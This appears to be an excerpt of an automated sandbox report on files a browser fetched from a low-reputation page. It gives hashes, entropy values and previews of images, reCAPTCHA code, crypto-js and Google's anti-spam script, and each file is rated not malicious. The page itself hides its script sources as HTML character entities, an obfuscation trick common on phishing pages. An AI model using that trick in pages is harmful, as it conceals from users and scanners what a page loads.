                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....e...S*....g*@.....~.g.z.A.&..Je.....rG..^.~..xC..ZK.st.-....H.c..<t^.Lu5..!dXDw.m%.pA....8.3../i-..t).EFK..o..+f.S.f.._.c p.a..pO...8.%tIn.....PT.H''.. .....N.......)...,a.M.02A...O~...;.n<3....-.|JN>Px..R.c..=..V2.*....q.)k...........-.?kyL. ...|.;.^02N....USQ..k++M-Yf.....R2..F..W..\..b.K.;;..E\:F.VY.n.....H..k...ou=Q..t.....r.N......U))........7.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):48316
                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (18288)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):18908
                                                                                                                          Entropy (8bit):5.6255223057698815
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:dVtfxzksuna6B3+9A/CY3DCcdye4PCwEnaeXsLRKyuHX/5:VKRai5HPIeaeX1yM
                                                                                                                          MD5:0240AA22895CF57CB91160E784542720
                                                                                                                          SHA1:F50652CCC59E7556511178A2A6BF92407D2E0955
                                                                                                                          SHA-256:5DEEC06E184F7D97048A4A0D9A182105700484EBAC0C804A58A4BFAE84B843B1
                                                                                                                          SHA-512:C4CADEB4398EB472EEF4989627E74C8CC9A80A1045F2C01E3DCFA63D20B52901223F90AB0A0F6F13833F627A0A5C4BBDDEB86CA9F4A2972654F881B2DF4B1879
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/js/bg/Xe7AbhhPfZcEikoNmhghBXAEhOusDIBKWKS_roS4Q7E.js
                                                                                                                          Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var U=function(p){return p},G=function(p,b){if(!(p=(b=null,B).trustedTypes,p)||!p.createPolicy)return b;try{b=p.createPolicy("bg",{createHTML:U,createScript:U,createScriptURL:U})}catch(e){B.console&&B.console.error(e.message)}return b},B=this||self;(0,eval)(function(p,b){return(b=G())&&p.eval(b.createScript("1"))===1?function(e){return b.createScript(e)}:function(e){return""+e}}(B)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var H=function(p,b){for(b=[];p--;)b.push(Math.random()*255|0);return b},C=function(p,b){b.J.splice(0,0,p)},e_=function(p,b,U,B,Y){function r(){}return B=(p=$q(p,function(v){r&&(b&&bb(b),Y=v,r(),r=void 0)},(Y=void 0,!!b)),p)[1],U=p[0],{invoke:function(v,W,E,e){function G(){Y(function(X){bb(function(){v(X)})},E)}if(!W)return W=U(E),v&&v(W),W;Y?G():(e=r,r=function(){bb((e(),G))})
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):531
                                                                                                                          Entropy (8bit):4.901652539830534
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:mey7EgKRVx8Ra1Der3OK2FrmD3pMCL8ENdH1Ca3tMWPGu:FCCLEa1DerOK2FK5MCwm51Ca9MK
                                                                                                                          MD5:75A80F9FF632DC0933D172FBE0C73E77
                                                                                                                          SHA1:B27D8254ABAAF3BA4A4C885F4877D2E0B63B1BA2
                                                                                                                          SHA-256:2422C9F92C2EF6445C0D4B3E76B89A962FEF902D25A5007F1C7CF0D45D038A7A
                                                                                                                          SHA-512:9B39F268DAE68D1C3BDD2074BFFEC14997E719402E5BC34482EDAD58B559505F96ED10C75E5D0D6A51802E14CD7E02CB6A6B75B155D1DB716568A027EC712983
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://berazel.com/wellness/south/index
                                                                                                                          Preview:<html lang="JP">..<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0">..<script src="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#103;&#111;&#111;&#103;&#108;&#101;&#46;&#99;&#111;&#109;&#47;&#114;&#101;&#99;&#97;&#112;&#116;&#99;&#104;&#97;&#47;&#97;&#112;&#105;&#46;&#106;&#115;" async defer></script>..</head>..<body>..<div id="mainContainer"></div>..<script src="&#99;&#111;&#110;&#102;&#105;&#103;&#46;&#106;&#115;" defer></script>..</body>..</html>..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):600
                                                                                                                          Entropy (8bit):7.391634169810707
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUT9vceKKNtY3kM8O+mucROzZbJOAjPBE2Iq8AnxT9:bTdcVIM8tfHzzjy2IdKT9
                                                                                                                          MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                                                                                          SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                                                                                          SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                                                                                          SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/refresh_2x.png
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):665
                                                                                                                          Entropy (8bit):7.42832670119013
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUelyuRs56fyKgIEInu5VLJBZInmJhd/3VqQXD8GBm1:belFRs56fuIEIu5VNBZInMTICfBO
                                                                                                                          MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                                                                                          SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                                                                                          SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                                                                                          SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 94 x 5, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):4.022997040570905
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPlz6t/Ny/hsyxl/k4E08up:6v/lhP0tc7Tp
                                                                                                                          MD5:2B83D27B27DC51B4CD4951CAF638E209
                                                                                                                          SHA1:9080E04D496FC49A26395CC7BD293FFF22FA7022
                                                                                                                          SHA-256:C8EB05C2613879111F71ACC304650FE1EBC7F7EB0A55A460F55E5D5AC67A1CB3
                                                                                                                          SHA-512:35138FAAD13E00185BB5B43762F03F146DD75CD85DE35D241AC2C9BC4DBC43D5E9C94FD27EA7D982A91D585EE68FFD0E2AE7658D25D22AA7799076AF840DF405
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...^.........C.......IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 94 x 5, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):4.022997040570905
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPlz6t/Ny/hsyxl/k4E08up:6v/lhP0tc7Tp
                                                                                                                          MD5:2B83D27B27DC51B4CD4951CAF638E209
                                                                                                                          SHA1:9080E04D496FC49A26395CC7BD293FFF22FA7022
                                                                                                                          SHA-256:C8EB05C2613879111F71ACC304650FE1EBC7F7EB0A55A460F55E5D5AC67A1CB3
                                                                                                                          SHA-512:35138FAAD13E00185BB5B43762F03F146DD75CD85DE35D241AC2C9BC4DBC43D5E9C94FD27EA7D982A91D585EE68FFD0E2AE7658D25D22AA7799076AF840DF405
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f48a7cc7ace41d9/1734624554141/BQm20Mq890_P8mZ
                                                                                                                          Preview:.PNG........IHDR...^.........C.......IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1434), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1434
                                                                                                                          Entropy (8bit):5.764806018887514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtsn13VYaaV40:VKEctKo7LmvtUjPKtX7On1FrLrwUnG
                                                                                                                          MD5:9562A43823586F6AC27BFD68008191C0
                                                                                                                          SHA1:7DE656D19EF76DA209801FB58CAF9A5768CB8E4E
                                                                                                                          SHA-256:F5E84A38832F846A7A36314906DDA59907313BEB04AD90E1A73A05BC4FF0B23B
                                                                                                                          SHA-512:7CF3115BD0081CA3B4416B23669833233CA2776941B7FFB825F2DEC6F79C6A1969075905514EE54400D6FB2C24C57A916D933B9DA54D671E9551FEAD83920C3B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2228
                                                                                                                          Entropy (8bit):7.82817506159911
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):102
                                                                                                                          Entropy (8bit):4.7451269354882415
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:JSbMqSL1cdXWKQKYEPL68EDwVjWXjjWaee:PLKdXNQKpz16XXL
                                                                                                                          MD5:488438579243B46010EB659E6CBB1A68
                                                                                                                          SHA1:0AA55ED415DFAD5D0BDC11FE33801D3876B6477E
                                                                                                                          SHA-256:8B3EE5A1B4A03B50A573AEC1AD977DE017B6E7229662DF7C65BC5BDA207F0A52
                                                                                                                          SHA-512:2AE9510777571021A0E52C681425AF6F9819F29B1F0B72A3BE3AFA9ACD9168B8A90340496B4D86022E961AF56A87AD15C9FD209A1D26D5C7EC49E0F344E01A46
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37
                                                                                                                          Preview:importScripts('https://www.gstatic.com/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__en.js');
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 98 x 90, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):11174
                                                                                                                          Entropy (8bit):7.97758318268209
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:b4JEM/GnDNmhq6mokMiqF/RhAUYaYL39w/RA1A4m63ux+9Tyv7RyRJgBHWHOYa7z:b4b4ghdiqFJyVpr9A63p9TG0RCZWH/K
                                                                                                                          MD5:A4741C6089E163F0E5C0CDB2C698A03E
                                                                                                                          SHA1:03B190C8D9350802CBABBCCD2757CFF1FB7115F0
                                                                                                                          SHA-256:C9685B413894B0647B42EDF9CAC1FC0B2ED044C1FE238D843B9CA3D29DB1B805
                                                                                                                          SHA-512:8F16410EDBC8893D9982CCAA1F2BA73BB1E7189B8101CE8EF3167D4663E5580A0BD2462295052A5DD86FA83AB3A0C4ED889204052951F8C6FA71E564D3EDCAFB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/canonical_car.png
                                                                                                                          Preview:.PNG........IHDR...b...Z...........+mIDATx..O.a.A.3.....@....YY.5`......#B...|...)F3S..8..H._.......N......v..i..k{D..r..wKhO...V*$..XD..(..*.4]8......t...Q..f!C.{...o.:.sNJ!.~R.....GFG.$.o.a..m...S.a...("..uu1....h......V...).....V...+....@rd9b.. ........5..7.]...........,CD./.......K.; ......v......H..`..$.p.E.I/.{....5....`..........O_...H.c.."G.Jp}LB.....OU.$..%....=..+..P` .....vR..^.._...a. ..vX.LIH..-..F..x.?......bRr..@.1....b...`#.L".........|....M.8$....IV.9s...;.WL....Q......8..h.....HIje.....a{.......:\...U.."...AYs.f.:.?RU.C5.,......Q.j..y...Nx.J....1.>.>-R.L.>.q?.H;.Z`.o...}...sN....k.........P.&>w*.0".u.$.l.W2.q.=I.H......2.......I.H.x..> [.,.t7..$$....W.`..D..#)....*...sfv..A_.....{....cy-..H.x.U5...Ew`....JxB..\.o..|........)..?~..D.A/...y0.%.D.;...0.K..d.v......;..x6B...Hg^E.6..~....g...'-.5.].c.[C2.$A.......!..b.d..U..$w:/.$B. )..P....Hq..3.!.l}]y.....`..s>.7.t.P.s.%d..E{M.m.....$.%...v..W..T:-........... 0....D4a".K...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5909
                                                                                                                          Entropy (8bit):7.912523231606688
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yENhVpO39YcubQpOpIXptLxf8743Ppw4nd+rf9X2XkOzr1WdWGKhhw8qwL:yuOy7Wprsopd+r1nOzpWdWHj
                                                                                                                          MD5:C41C7CC395BC5B233D797174E524AE4D
                                                                                                                          SHA1:51AF38BB24AC76E3F62F2D193D12CB5C6FA9C946
                                                                                                                          SHA-256:BD5160C1AEC031C3CECB9F309101068B751CEBE655D0E1BE4A044D235DEA5C0F
                                                                                                                          SHA-512:B1E964D57959A22E4A397F9BE5C1DED31570E4A4BFFAF9AD4506A3E887C7A1FE8BDEEC4F4C0273DE14F9F578CD2B57950FC11DCB323AACA7F5AAC52B68DEE4C0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....~....A.0eI.T;.........^8.p..a/,..r`_.............9....{3s..:'.*..o9?x..0$..=F=.P..q.)..}.....x..P.I..`..j%.S......~vf.....~_....U.{....v).0.U...2N.A8.A....d.@..s)x.T.....OP..q.i.?..l'[+..4m.B.`.e..8...q..V.T.#..wD....)....8....../.......+EZ.]...{.../.<...1.JIO..~.+.g.....5k..)wx..P..C.8#qbN...z.*.]i...-k#\.<.%R[..`....t..Z..u..1....v..1..W+.@.'>.b..e.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):78622
                                                                                                                          Entropy (8bit):6.020797727289313
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:OfGNbFoZJSUYOOaLnAW8+IcTOIWbBehXwW5vxM:mGRFauOxLA/+IcTOxGXK
                                                                                                                          MD5:652DEBB6DE760B1944F8993AABF8FEAA
                                                                                                                          SHA1:BD70DD93F85E0CDF4B950AB082B6873EB6CCCD25
                                                                                                                          SHA-256:C5C9564F786A985BE35E9D346D83EF5FFFBCE58EB40876AADA93E4EE0F863790
                                                                                                                          SHA-512:DC1E56CC00279159A0533C3DA84E41F6CA9196B33195DC9BC8606E20CCF5AF6CD1E073608D788EBB7895BA359B9EF3C4D9EEB6F7B473BBEFEFB9AFA2E8C8E343
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/styles__ltr.css
                                                                                                                          Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (47691)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):47692
                                                                                                                          Entropy (8bit):5.4016459163756165
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                          MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                          SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                          SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                          SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:1
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7726
                                                                                                                          Entropy (8bit):7.949882373759263
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:yZPer6Bhe6O91pJ3s8qD0wngAuCUeUKzvn:yhe2her9RTqmheUK7
                                                                                                                          MD5:879705AC5AEED73C7C02FD3F89C84802
                                                                                                                          SHA1:84D178B5781F2EE3B3340C9B5A1E11BA27237DBC
                                                                                                                          SHA-256:8B81B87931012908D4924C0870B1DC8D540AF73C475D6192F745107BB4A4F07C
                                                                                                                          SHA-512:4C1914B1B9E428BB112CF2BE021E5A913FBAA70808E7D33E77BF56208FF24CD3426FEF8E736A56177BC5B4321A0D584E96C0B5B5F0149CCC75D2364B140F8C33
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
